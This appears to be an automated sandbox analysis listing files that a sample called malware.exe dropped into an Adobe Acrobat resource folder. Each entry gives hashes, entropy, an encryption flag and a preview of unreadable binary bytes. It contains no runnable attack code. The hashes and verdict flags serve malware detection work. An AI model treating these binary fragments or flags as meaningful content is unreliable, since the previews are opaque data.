                        Preview:k.\-.5b..bF....7..u..B.....*..0.1K.....y.ptJ.Wb.uQ.o.P9.O.x..37.....T=.Q.P..g.....7E.-.uo..kZ..t=..|..x...3%{.Es.,..[....5...._....l.k%M&$t.yC..0z'8o[..'@..iU.@..J.=..p..U..S.j..1..i.7k6.f.......(h6?5?@.`..!.....:W(...P^.A...7..80 =....E.a.KM4.^!(y...U..!....<....A3.itz..&.Dv...:.b...\z...;.......4......ND!...U...P..];.0......8.T4L/...&.....SA....#Gn..C.5.-r.;.5...>W..{......H.FN..../...9z%:..N..:...M...f..{.r5Y.........~.iwE}......se.y......F_.9}.xA.../V..}.4%...@.....*(.BG20'.v.......`...mCG.Lr.T<.S..G....S.........h..tX(.A..@...qt.9U.N....k .._:!....j..@.0.n.E.....[.)....n.y-N*@.7.v.`..{5..J..@'X.P..\`@...{.&.1.)a....1OX..o..})....R..{....x{b".l.G.....&sG.:.-..A..@..cJ..a...Kc.P......`..=.i..Db..2..'.<.j.(........'.Qc.lX....mJ..../...7..ae-~..].-g...u..b.;'.....m...q...k...9...)U...ksz.......54...S7....u{.N.8.C.L.6..N-.Z..d..<..R.......8-|..A..V....)..x"..;F..@zS.!&K...'..d4.F.`+....q.u..f.%9.3_ZHS.k..Xd...]..OC....R.(...\"..4F.U.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9216-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):38076
                        Entropy (8bit):7.99530160841795
                        Encrypted:true
                        SSDEEP:768:xSx/oGk71VNrxmc8KAy2GCPGxE4PFXq90vGsrVM1gC7I0+0iFDGcvgLjJB/:xSLiNrxmFy2GCPI5Y0vGIMF7K00DSv/
                        MD5:DFDA650A6C6EEB9E1E6FE411ED012C66
                        SHA1:906C47D7FB16517C1207DF201303D5A841D8585F
                        SHA-256:5DE371DB2C9B8FDEA65A710BAAD607533EBD69A4B43B85EBB9E8F192757A1DC8
                        SHA-512:F3501BE4C05CFF622A8FC5BB2D9436F381EC79657481C978F6671510935086A4DF99445E1D10A95EA8A22E76680D0E9BD6983C9E74A2D1E82FA52A5C8B59C6CA
                        Malicious:true
                        Preview:4@4.H....8jJ.N.18m.Y.+.:. .A...V....:.r....y~v\..oO.+...%.....}...v[..co.fQ.7.'.9`m..sKrJ.......1S.......y.,..C&.!... .7...sc.d/.`.......s..c.$.o..$......T..`*u.Z...n}...1J....OhE\.b.E..D..w.....j5.H6.....?/...`$...i..?`'...F.iK.[./..W..G.O.N.#l...\...+..Kq...\}.t.Q."......jAl..=...[. @..i....iD.x.q.}\|s.uZT..!........w{z.....)/ {.*...`..Do.?.....{.[c..3.O.^F.F..)gv....O'L....P...6.AL@....+..._Pu{..K..I..B.X{C..X.ZRz.4.%.zC...q...s..q.D6.....Ut..1.....{..p....lk.6}b.....9bS1....F........ .....k?..p4.v8."....)..3r4...O..s..x...T.~........q..4...H7."e......&.."F.....CP..p.:q..[......N.8Z.sc........F.q...x.+..f..0W'..z.6..-.&N..N._.D.p[.Fpt=r..u......{..3.........~!H.?.Y....MN...pg.....c.\..>..}p;...J3D....+.b..k...+.3..].g...@_s.x9...a.l..]S...I.9XI..j..*.t...G.H..m.?.I.[O.V(ns....x.:..*..@L.....".,&j...AX....Q;e.9>...I.i0.^~............3...V.#...Fp..R.G......H{........j....gE.F0.'.'.JG.c.8.:....9...z..,b....A.~.,..*...c..8.FF{.w..0..$.2

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9263-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):12956
                        Entropy (8bit):7.98668835876511
                        Encrypted:false
                        SSDEEP:384:SArj8rA5SA7iPcKSMIReDb/VzrzOmvS/IOwR4zzZC7v:zQA5SA7yfSMaeDBrzu/IH4Zav
                        MD5:74B5009CAEBD41EC11459D84B8FD1E6A
                        SHA1:06BA50ABE88EE02FD162DEEA108B7FACFBEA6C33
                        SHA-256:27EF6544D235C8C690171E6EE5060C60C20A4D099DB0392B51FBC8A8167BAA96
                        SHA-512:F9CBBE63D2484BCAEC7AFF2965782C91B161897D07CE1829E041C646AB2738AAC7784604EF4EB0DEEDB0D8B4AEE3E971C16AB535E519227DF53F8206CDF0921C
                        Malicious:false
                        Preview:G...bu..@......|t.........a<*.{.?%6...w..../...]$..........B,$"......#..Q6...Wi...c.......Z_.k.r.FlO,PE.M..@}...-.........;/DA....8H....?.I../.g.%....23BA.2.H.D}+/..E,..............Q.;*4..]G.EU.TCw.i'.......2.?........b..X.Ap8@$v....i...N...n.]..9..4.Y.........M.W..4.Z..ss$...4.#<.J.*qQ(z>.hC+d.sc.a<B.I...Hr.Z.......Fk......I.}.;'.z...pFP.1..O-........L.1E.{...G..-..M...d..<...U...B..$....Ig;.E).\.MKJI.d..4jzS..A?.j.....M...d....^Q...A68~+.y!ac...qMn.)..Te...!..g...nY9...!w........XQo,Ee.......B$s/`.....6N[.....p..wt.4U .ChH..7....F....e...@......v...<../...{..74en'".D.E.....K.M.Zg..AF...v....*.0a..=...b......q3..<....:.%.;....V"Y^...H....P.N.I....T+...i..../;h.....+0z..@..A...F.G$jr.....'c......b..$'.n...1......34ICD...@..v..#).O=..t..^6...?.}%x...MF.O.[....`..@.r......C..l.i.....5........k .5v...._&....I..'.qD......,{..6...X......j...#....=..IJ....Q...u.9}..6,...?...].W....F......2..E.`1.`.&.`.a..;..j...aR24v.-.<z&.DwPk)z$p,/.mYZ

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\92bfb68adb54a6ec950196b4d39ccf3e.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):30108
                        Entropy (8bit):7.994290747966612
                        Encrypted:true
                        SSDEEP:768:GzVGuT9NSGaHIra66GcguKxIK6fSOqN1tODQQCAza:0V6guKx0XquQQ2
                        MD5:6EF1AC4594CDD5D8ACFCB8ADE0644F1C
                        SHA1:6C8AA7887980B16D766F179ABE36559EE3028802
                        SHA-256:51FCFD08E617F5D6726B26FFDC16CECC2489C3D498716B4C7B6C19C836A7EC4A
                        SHA-512:11B6D13EDCC82DFAF34F3A84AEDF85C3CE80EC0ACB99CA6B4CBE0175A5F20DB91BA227C29FB6A225C9B12A032DB66ACCFA79977ADD093E63C203FA30BD2A75E6
                        Malicious:true
                        Preview:...pj.....;%...tY......._H.....a.b..y........Y.5..f.&..g0;......B.vVQ...Y....?..8.X.....5p....b..3BK.....p.}.:......Hr..4i..Q. ...x.h.....!P.].PP...k2gs....tN...tl.Y..........l..,JC..2..<,e..2.y.%.Y^..PiX.YBm....<+..8|y.u..7T.$\....q+g.RK....?...kM3.x.....-}:.....\..?m.'......{-..L...0H.\."9.?>M...?........."7Ax..}....}.k..L.8...............g...M........o.....1.....l4.......C.....T.s..>.)![..VD...4}.0.C..WGJ...-%.t.O\>.......x.P6,..+..........H.r......c..........@A j.9h]O.c......,b.....3:.U..l../..q...~..]....{....c.%.!.a.{9_.4|.'..;<?&M....EE..nb.|...u..k3?.d.73..an..j....O3.A1o3o.4_..c..nf<39;.u.M.?..`@....!..8c.E.o...E aU.."]FFS..o.!^X...cf..7...u.^..3.R.."...[..,....1.....q.....sq&.axzVXCt.6~...a56.....N;....o.x..Md.t..{.J..|.d...(y-..U+.....|.5..qQ.*<..r5J.,.iz..%..../.......Y.P.$zt;_..`.......8.......>+.........=..1.T.r...QO#..U.P>...BP=.y..-.s.......0,G.....#:o=.e...S..U..K4M.z...@&.H....z.Ud....P...Q.N..;.'...FM.Y.......f

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9488-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):22559
                        Entropy (8bit):7.9912532405290575
                        Encrypted:true
                        SSDEEP:384:O0c3xKsZev3Zbf+cixIFtWhLoAfBBoSzRwvZ6uLXYXSRJpxSOpTk0f9llRy+9oyl:ExBefZbGzxytWhhoSJA/px39LflNJya
                        MD5:40C3D48FE7A26C86B2B3A852E55723A6
                        SHA1:631E7D4E75F60323333E16D96C145134075678FE
                        SHA-256:7B11BD4944D38128152743C9B4B4F390E02D7BBC2F30542FC88FCAB9BA68B4FB
                        SHA-512:79A036928CCE8A4B2AE15AF91AD2EC885D6A4985637D26A482786062263CCA4A1E609068614B272972FC7DCEB01C693D8CA69DAB2B963BCF979AADC132020D1E
                        Malicious:true
                        Preview:..7....N...4?...1..=.$..Vx...s7.h.?m<K..G....Tg.!.U=...z....NE.*..!d.9.)...*9[..75N.!...O..C..h._.a.,*.x.U..#6.gS"..AI.....i9.....p/.#.U!.....s..".$..G..... .T ......z-y.ur.`..t~2...A...L.."..8.P .3KR[...3...V)......I$...`;....:S.hV...l..W.....0..*#*U...=...6.H}..X.b..e.....j'......../..^Z..HG.BE.:...."p<..!..Z...r...Ni...3.j5......j....G....y.{.iE.2;...i|#..B.].H....pd.,.s~..Z.X..A...I.w....z......|...0H\j.bB..yR_T..&..v.Z<.Z.....QX.}..3..P.j.'..(...g.=.fe...I..(..T.X@._w.4.MKi....+VH..F.[.A...=.R.F5..r...'.vD....Q...H...p..Q.'..wH....9..k6I...Kdg...0..R....o.\{_.f.3.*u....5.......o[...>.;..Z.G...6m|..G..{...u.QyC....h..lw`.)#RoO}...n.....$.u.,R........}.K.%x.M.}......?g^t^.W.......|..7.n..uj.....js6g.4......i.d...FKP.?..-...X]..B.{..R..E...I../v.Y]n.....?......:.%.'.b...M.2.../...K..fq..}`..=.TAK.N.....Wj..xN..J..t..#..aSN.$."K..'.e&.\.].1...rA....RU*,..qg>fQ.....,.'.N.[....{."i&]...V.0.+..:.i*....cB....8.fd..{KL....U..~...Z.5g...$..f..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9991-chunk.js

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):11214
                        Entropy (8bit):7.984416985354158
                        Encrypted:false
                        SSDEEP:192:p4oL6vXEbfAe0XCmW6i7L2KHKnJgd4o9aO/Evc0Splr41h1kyi79/OY0An7bmMje:p4I6vXEbfdMbWlIukGDrGrAnnm8e
                        MD5:4DCBA5D5D415E264919C1FC282FC327A
                        SHA1:D44495AC6DCA45BB105E7F1086D0AF005C19D397
                        SHA-256:437CBCF9B625DC7D47AE71374FC7A68A73B7EFFB25F9819574E477B2575F4BC1
                        SHA-512:C260B2E439CE5041BFCA604FD4A54CC9A5D7F7F5223008816B1EECD5662C9CF80BE4009837B8BFAF4361772B4C4698605060ECA55E5C8AC501795642AC0AE0CD
                        Malicious:false
                        Preview:J+...:.r...^.Z.s:..............E.......|.....u.3V..w%[...,!..".q....[..:...yL..X.n.O.b.......2.:.,l.._>y..W.fN.H8/ ....~..X\.Nb.'f.K.E.O..L..YD...(. ...@.(h....&."N..(D.5o.M...>.T4u...+.d....Fh....G...GK`vR...#(;...sm...a.S.'........X~^...h..U.!....h....?.. .l.]..f..x.N.E&A.4...d..TaY:...j...kh......E.\...@U.*rx.&."..J..+$..^,.pt..k.h.P.c0!T.>A9...!D..4M7W..1t...N.u...#u...}..{....i..>..[..+i..x...g..5...@p..Bp....Qs.".>...]/.....H..L...4c.#......A........C...J.*....i.$...\4..OF..fH....X..b..wx.|X..`o.....y.b.)"...-.......l.....(}........?.. .z.j.SC.r...[).S G...#.D`k...]0mi.K.+...T........7.Ep...)..w*...`.h.&.X..:6H....G...GC.....P~.......u.!~.r.^B..D..|....W...?.....n.._.z.#Jk.....-0(.h=9_6_9.H..:.m.I............8*....X...K..W.Xj.6....g...~...9pV)...}......d.....;.S..0V.%......./...;|U:cX....6..`.*..No....E..K.3T..9.t...%.H...>.........w..mc.s...h.*e.Ru.....$WQ..P.."^%.....>pu...N..i..a....{.u.m/.W.8g.R.Y....|..,....E.U..U.7.C.#......v:

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9b1662bee64658ff8dd184737a056510.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):79291
                        Entropy (8bit):7.997701006963142
                        Encrypted:true
                        SSDEEP:1536:X27voqG4iKNxyWxAQns+yMRmkqMcB4N+tiOFvnUrQmW5:mrN2Otx/ns+yEmkK++tdnU6
                        MD5:218D9D4C428D27F9B4955E9C137FE503
                        SHA1:5835770F2436A0E23D75DD6A92FCC6AD825BA2DE
                        SHA-256:74E4814E382E92D13A0207492EF6E339308D1BC145FBD13626798AAAA17BD73F
                        SHA-512:016BD4E458E47567DF1791ABF0D0D3CC64FE891BDB6DBDFF3173A473D42FA1F8E2B5A2B4CD70887E5A9D432EDB92DED6FD74A38685B381364441961296E332C4
                        Malicious:true
                        Preview:[.@...Q..[.B.... ..T.K.K.:.....S..,.A.oZ.....ttg.\.v,}.;|v.N.u`....&.|....E..#...YR...J...q.....7z.B+<....n....x.-.&.E.h.*....L..7..6..8.Z..-....#..w..:P..e98...D.v"-b........~...r.....X.W..V".x.e.l......Y....h....C.f.%..^PYU.:Jwzq.. .n.vU.+]H..~.....Z....?#....i*...1..........b...H.y.H..{S?\..U.Gs.#.h.:P'u.....^.-...EL.{.k......JMU.5...+........0X/.{9.w......C..!H..Ho.>rJ..5..B..\k5..>`1...0. 7...............S.......M...q..|.N.~...)Me.U.3.48..iC[O.FD...Z(..^Q$p..f.........:.....<.:Q.cg-..&.Ps..K...q....C.c......w..P_.D.!;........f.=9J>....lCD.V..>..c..!....T(y 1~...|.g...C...L".H.*.Y.]!...r......XP.!.....c=k..=..RY...!.\.!.....[w.0.F...la.~....j.....z|.!Hj...[avB.....%.c...GL)..D.v=.V.,....;.....I......7...^.B,q...1e.z..i..d.W.c4.U.......+...m...N...'..-...ct..5YO.0.!...r..x7...0=..9.T.U...>J........!P..NrK.!...2.7(..g'..R...c,=...xS....-..uP.@....d....#..!.....k.V\..n..}B&H..hc.hy[..~.h.d.?M.mwX,..!.....H.6....}....-<.54..7.h.........

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\a56350ec5a5b310e9f4c7e10e0b6795c.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):331929
                        Entropy (8bit):7.999420507338244
                        Encrypted:true
                        SSDEEP:6144:3EStxfUHpZ9kbiYm7o3xqdliQCAX7j7nIErWe/1hmL9X9DyOuGhvSd8U:3EStxi2OYm2Il9xX7fNWG1ExXvK/
                        MD5:BDDC31598299E9E185132F3CB3D58AD0
                        SHA1:2FF43E4B2D81A5FFAF3CFEE742ACC81E0F5BF039
                        SHA-256:A8D35428271D72999EE1DD681B1957603A81E57493D6150542362A509A7D26AA
                        SHA-512:AC0C8CCB4A7418D2BF3CF8472C0E0569B10F31D3D30BC7B804309359B3B72B8BECE2AB90ED2D77FF80E4B11CDC27D02F20DEBA32BC099287A01DA05FF4333E38
                        Malicious:true
                        Preview:...m.-|ye..X..j8.Y.....JD<,.y\&""e$..Evq...|.N]..K...\.C..{...o6......e.8.......3...-...j..)..9.[..[..*F....*...h..H...h+m....<...>.A.,...?|.$e.\t..U.....!t.Yn.i..D..U...)8...e}..bv....x.....\.^.wZ.fO>...!..}W..Li....[....y.......O.!.`.K.o.b.Iu..pP.yt.....R.~~'.pY.;..P....4.>.]y.=.........s...n~.g...Cl"N.O..~A..f)..-/.@..O.T.._c......b...........!..Q.'Zp.{(T#.....{..x...[O.M...<.C..._.rMk..!>..{...M..Qm..4.....(_....W..U.<tz...2.........3...*...&J.|;&...~z....v.X8.2,.Nl...L.'.8D#...'.|..,fx[5.........p..+.o9 g.a.......O.\.....k...\.#4.Y".....|..%....bP=....f..2.X.g.........m.p..[..F..2.........6.{....2...a..>n .....fDA....UB....S...!.@..._......%'=b.X.V.Y......U>..(}..w.4,.>...m..>+t.E..s...j...8...43...Y....g..Cg.=I..p.V.F+Y.1..-.....=k....G.:'~....T....?..C...Q.q.;..LE..k.?OQ...SI..7......m.....s`..1....+1p@R.I<.9.4...k..S.{1GR...c.k.`......h..p......d.L.,.o.=E....|.j.&....^./..B5-......Z!..;!...%..s....x..D6s.................=

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\ab27b355502b23edc57dcc465635c3f5.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:Dyalog APL component file 32-bit level 1 journaled checksummed version -71.-84
                        Category:dropped
                        Size (bytes):11161
                        Entropy (8bit):7.986459188656469
                        Encrypted:false
                        SSDEEP:192:pWlUoPQjklKM/PkvQ1Dj8uEfuof14h2Stab/P+qCwUwZ+cBL8FFmi:pKx4jdMEvQ1HextEo/P/4ALgr
                        MD5:11FB3EC6860BB337D03B7F4EE9877A7E
                        SHA1:DD8227ECBCF19568B85C383C33166D84C73F1CFB
                        SHA-256:DAC87DFA1F93AEFF095B6F594EF80171E23DE6B06E4A0AE1A8BDEF6828B56CB8
                        SHA-512:FB7C6ADF7881F4BA67ADB098E3617B8D483330EFDBAD85C7470F4F019C53791B6347774F0D9536982CD081CA6DA1401CF70B684D716C9FB20CB41BEC4EFCF4E6
                        Malicious:false
                        Preview:.....N..q].V.}c......Y.......{.....1q.{g.....m....0..n{?l......On..............*F..pk9S.r...:.LS...BK.....Cy0..r. *..3....i9&.=F...n.>..h...a...m.f.*X..u.&E..;Y...L|.k..=.6.^...m..y..qB.4..5. .n._..D......p#.*/.%._.X.l........w.xJB.7`.z,x.....r.)..~.$.)...m........7...z.=#....'H.GN......,,.R.HJ.Sr....Z#.....Vp..@.|PO.......=..X...Q...+.'...a?.`.....<Q.G.6.2r.,@.:.....O..=06...~J.m...*=.\&.$.......z*0..@.d...k._....G\..hBi..Y7.|x...."...N1....@.....+.,|....R.p ]o...l.."%...|(..h..T+....."&..U..]z. xV.....Q..&......M.v.O.0<1.......E...Z%$......g.E...pe..8M.....3.%...).C.......J..V...CV.&../....F.i.e.\CyS...[(. ...".....w.t.2&....?....K.....X.87.w.d~........2C.VA.k...1........m|..R.n...F=.I.m.Y.cQx....8..F......_..|....k48d...R.._..v.jZA.o........U?..}..`........y.V...^.."....FW...|a......p...1.VAx.$..p$.....Oh.uL..R.(.3.......+q..i....h]7D.m.Y\{h..^-.J5.j.*.h..F.w..;...6.u=,......s........^.A:D.f.^Z{~.0...(...N]b9]h.|.u

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\b961cde276c90015f1db51975a470747.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):20967
                        Entropy (8bit):7.990664893454612
                        Encrypted:true
                        SSDEEP:384:+x1myBuBieA7XnZPJUE0SXU7KencW3SwgUH9ji8eHuMoZjQbp1GpiD0gKuzRC:c1CizZBCSwJ3eHu/Z8lOp58C
                        MD5:3F6DEF2ACE61FB46472B8A9D2AAE95B1
                        SHA1:034446B859D278A70C9ABB96EAA6A26F49629ED2
                        SHA-256:192F16FA3E005951E12C4B70FD78C4F81516CC19F8ED7FF5FD7BB73D7821C94E
                        SHA-512:6D85CED04EA008A08550686E295909BF7D98474389469CBE8BA25A34B9496A6BAF9A39F978F3941E4218E2A651583B9232082C8A423EE4E7DF6E3FA88734CCEF
                        Malicious:true
                        Preview:.......wH3..<.E.3xc.4.<..].....Lv+.......}.'. ...*To..s.%.....Wb6.f*KJ..O.....mU.@....UN!.E.....J...z.6..K#.t...%~.BM.....U....Gf/,..^.b.t..\I..~/...x.+.....J...Q........Dg.`t....R..+....S...v.....X....j.d..I.o........u>.\.,.H..zq.}.........x".t.DbD......q.....;..L..O.|t..I.?7.....6P.L..%........s.}p,.*....z..%..X.CgR^}..K..[...c?..o..}?.4.~..j+rvE106.#..n..Jj.J.....L.'..8G-.....{.n..x...,.=.0S1..S.......w..h8:.!z...e.=.......=..A.CC....C.q/....f.;!....c...OO....f.......d\~....y G{..m. .4t..%.........k.v1].....I..-....).s...).,`tQ.y.....K.i....?-X..\..7.m.U.T.#bwK....q.D.,.c..q..ld}'.AE..yI.....l.=..3..;.A.!pf.US"...b`.%kZ. N].r.Bu.^....3.a....._..&......En".P....M-......v6./.X..fR.......I]j....8..I...AeX..}|@=.@.....f^`..%|.Y...,2Q.s..l...B..:. ..4..-\8.X.=......$......j...p...~....Mi..../=.....1\.HJ..*=..W.%S.d..e..j..<...*....S.(~.N.]....q...;o.uYW......U..5.bT.[wWu3N.............(...5......l.[k.W... .i>g..`MJe..e./?s.n)).8..[.:kR.n7|{.\.

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\b99178ba996d2b4a255b0f163dcb88ce.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):58789
                        Entropy (8bit):7.997402042099046
                        Encrypted:true
                        SSDEEP:1536:9YRrdxZotplEU15M3j24HhkYzXNAazbfSvmFWcpTMBjy/:oZspGe5M3j2sRAaz2+Fom/
                        MD5:3E5466730A43D91C5E7BBA0156E413CE
                        SHA1:3CE3D36C457E825C1376A2176C1A4289F4BEBE59
                        SHA-256:F8BECB798020D93A9561A09BCC8C42B289E718520A62620569AB8B4B25B31D0F
                        SHA-512:DB3465AD877C549F2DBD4680B6A366C2AEAB27CE25467B60D7FC9815B50B332B059583C97064A4D7F7AFE8E1D713641F6D50D21B65B42DB93D5843F0C884541F
                        Malicious:true
                        Preview:.xl.ft.4..Kh....0.k..$... [......9V.Aoo.U-#...u...QY....I.).:...w...*...g...P....(]j.C..E.8_t..1..w.vn.'.M....~....K0.E.._~...Ds...V%o........PB........D....zO..2.kmNGT.~.~U.....E5....h......=..........U...7..s.tP.pA..I@.t....P....wfY.W.._h....R.).....v........Ff..`....|\m..F..X...Fz...?B...&b.YZ*..7T.....F*.nqu.!k8i.n.1...{.mz.sDM..#.?.~h......G....O..._.....|fRNqW&M.h.F..M:q.1..V......&.......38..j.v.z..0k..oa.E*I\...9w).o.....C..f..J.;6*...m.V.P..G....v....m.. o[..F...c..h..{..$R.,....9s.z...<6o.m..).....f6..A...l...G%..LHLB.:..X.*e.T.b.>5..^.4R....Z..;.2&~K...@E.y6M..^..+h...)U.-.OBb.v.....Y.......+......&......5.8..)k.G~)).N\...=...V..T.]....s5d..!FZ}...q....k~..a...8F..Em:W.ykg??....V.fi.....H;.MU..C.r....I.,....E.Q/..L}..=...kU.....g.F........:K..E..H.8q.].E....9..ld....~.&B..8i....nuXN.R..B....`..beG....Z....`.."*..<..p|) .z*..X..Xv..)..L|.G.....rW...Y.T.....?.Z.;..q!.VFby..`..c.....0Qr.].U=v.....1S*@.....m...#......?.4$.|....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c124efa99176e538252a2ae3cef2137e.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):319626
                        Entropy (8bit):7.999410706611814
                        Encrypted:true
                        SSDEEP:6144:kb5fsoSnBPPSqkNoJe9cqctZZJaXjUTDt2AkBuHvWM5p5GHQo7FRIjIs/XJPS:MS+BSJfCXj6DtnkB6cFRUT9S
                        MD5:1F13106BAA27AE1297366DD36D886BE2
                        SHA1:05218BB9099DED8BD582AC6016A41AD3714DD48C
                        SHA-256:1874469ED3CC60DB60738816760DC4C48299BD3C55C1C6B7D12DF1544355AAA4
                        SHA-512:622D14FC56D6A7C293A9C86098EEA680860B3D35A08969F441B7E864A24671DED615D2A25A31C7325FB8DDAF3EABDD20336155830A733849F2200C17BFB234C0
                        Malicious:true
                        Preview:...dX.I..T...'n.*3..,S".%..>@8..v.o.<jE[$......i..T..u..Wp........-..'..SO.C......O......w..jO`-.u4..r..w.5P#.........8..yVFy:..o.xw./.n2.Q6.GZ...u..MZ.NrB$.J..u..F..S.*.8.X..SF..M#..c.Bd....5../{.m.f.....Hh.....^.R..J*0.......;P .../H.....j.n.i....!&..._.o...X..!...E..../_.3...u;E.0.M@...+.E=...X.gb.O.....s.z.q.?..Y...U.t7..8.y.......z...s.C...Pq.G..T..6.6y]..UJy ._./p...V.wmP9..\...%..o...v.s.N.^7".o....]..z_]*K>....*.....T@..#~.z5....V..W.C.Ax.*....#........FO.....$\..w ...V.9s.i.F.$*:...{....N./....I.:L.0...i1ALr.`......2....,..D..5....)b.S.o3.f..t=3lj_....55x7.....1..f.q.t...N........).)!0A.$..........;nQ........$.......-../..f......mcv.5{|.t.@~.7.."..r..?O.i..[..r....j...oJ._..[.e..C....Z>...mN;..=...M:d.R&.LB....#.^..3..~. ..4C..y.&...gp..#.%....UC".....^...G....k.i.?;..Zd..VB..\.....>.u....VW...V..=Afg.."k.IF....."..A.......^.mu..2w.K /....B....'C..[......Oj8.)C(2#,...J.......1#.+..l.....)..^..H.mp.p.l1.>.....7*nk..QMK@...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\c6534465ea418b6c252e2b74bc9e4bbb.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Secret Key
                        Category:dropped
                        Size (bytes):262666
                        Entropy (8bit):7.999368352806927
                        Encrypted:true
                        SSDEEP:6144:ixih71CoyUHj6eHos7UvOveQ3xkDH5UZo5q4TI:ixiSaWeHEvOYZUZo5qb
                        MD5:D5FF586585C1C73FB1EAD62902FCDD33
                        SHA1:B7320DBF92E4EEB26BA248DD6A6704AF0CABA51C
                        SHA-256:8DF0674841E263B79688ADE6C433102095138B1540A19EC21D3B31D8027FAFF6
                        SHA-512:949C54F4D8E17DC6FCC38DC10009162CBEC0D5E18C23F382EE50ED18AA017E6C37985354F742FB258252973105337339D83102431E3FEAD3ECDD03D39382D01C
                        Malicious:true
                        Preview:.`...a\~.f.n.R.`..M...D...a.....:.!..B.E..........=d].....K.\..|{Z...Yi.}H....-cb.s...&.c.....J.>...Eue.y.Y. ;+.....T...F.9B.I..e%.....]l....1....^..........l.v!#..eqS.......u..U\O..........G............sqc[l4./A...7N7W%..0.46....2p......Mu+U-"..7W&.;V...b..t.....$`.....4.^.2.B....Q.....1...........e7#...vv4f...._...6.s...A......<"....X.......~p...j.zT...ku..Zw..\Z....@$....7z8O..L<......1..b.e./..F....-.P..X.0.X.....v9.R..c.X.......A9..."".t....c.^......y..1...l....v:..,4...T.8%..Z4.`6h.C#..3.../....v...Q..lbBn.&;q...;....,.L.p............8V.....N...b.?d......u.z..r.U@...7...H... .TG..HW...8...&.7{..:.*jv..M.....R...,...^AV.(..u?OQK.'1i... ......... Sz....p....5.U.p<..&.~V..3Z8.(.....#..e..&..hG.CK.'..L....!{.....9..!..nzI........?I.........=..S.!.&.X....Vv...=....)....;.2.......5.J....e....q.m).~.-DxB..@...[...|?!4Aj.........dN.,Y.BbE.'.?.9g.sO..u!.9....V0.<...W .E.!a..Y\.. .........'T.1.o..-...{..s.C.v......T......Z._@.0=.f....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\db3460ac8568d0137d4556570169e475.png

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):41922
                        Entropy (8bit):7.9962983707938555
                        Encrypted:true
                        SSDEEP:768:MrLBhp5fwF2QehEQpICdylA94st18ISCRC5IyaCr7wfPoy0RRpZU2XdTmJ6w:cLBL5faNQpISKAyY+CJk7wfwy0RRrU2S
                        MD5:3B0F2D328D008D2433476A6492B03E78
                        SHA1:BE3A9E76D7F105BFAFCF036D18377837C536D606
                        SHA-256:A2E168D07F2783ACDCBDE25838973E8C5E498873FC01B6803016A4560F193FF8
                        SHA-512:91E822A416AC9C80D853F7D5073A4951E557DC500CAFC6FF95B3083C77E76ABA462F7425A66F437BC5F1DCE67F4E63DC2BD1FFA2C734661F1BBC6C81C95D1836
                        Malicious:true
